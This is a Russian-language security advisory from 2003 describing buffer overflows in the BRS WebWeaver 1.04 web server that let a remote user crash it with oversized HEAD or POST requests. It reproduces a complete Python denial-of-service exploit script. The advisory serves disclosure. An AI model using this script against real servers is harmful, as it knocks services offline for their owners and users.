Дата публикации: | 30.05.2003 |
Всего просмотров: | 1177 |
Опасность: | Средняя |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Отказ в обслуживании |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: |
Microsoft Windows 98
Microsoft Windows 98 Second Edition BRS WebWeaver 1.x |
Описание: | Два переполнения буфера обнаружены в BRS WebWeaver. Удаленный пользователь может аварийно завершить работу web сервиса.
F0KP сообщает, что удаленный пользователь может послать 32700 символов в HTTP POST или HEAD запросе, чтобы аварийно завершить работу Web сервиса. Эксплоит: #! /usr/bin/env python ### # WebWeaver 1.04 Http Server DoS exploit # by euronymous /f0kp [http://f0kp.iplus.ru] ######## # Usage: ./fadvWWhtdos.py ######## import sys import httplib met = raw_input(""" What kind request you want make to crash webweaver?? [ HEAD/POST ]: """) target = raw_input("Type your target hostname [ w/o http:// ]: ") spl = "f0kp"*0x1FEF conn = httplib.HTTPConnection(target) conn.request(met, "/"+spl) r1 = conn.getresponse() print r1.statusУязвимость обнаружена в BRS WebWeaver 1.04 |
Ссылки: | BRS WebWeaver: POST and HEAD Overflaws |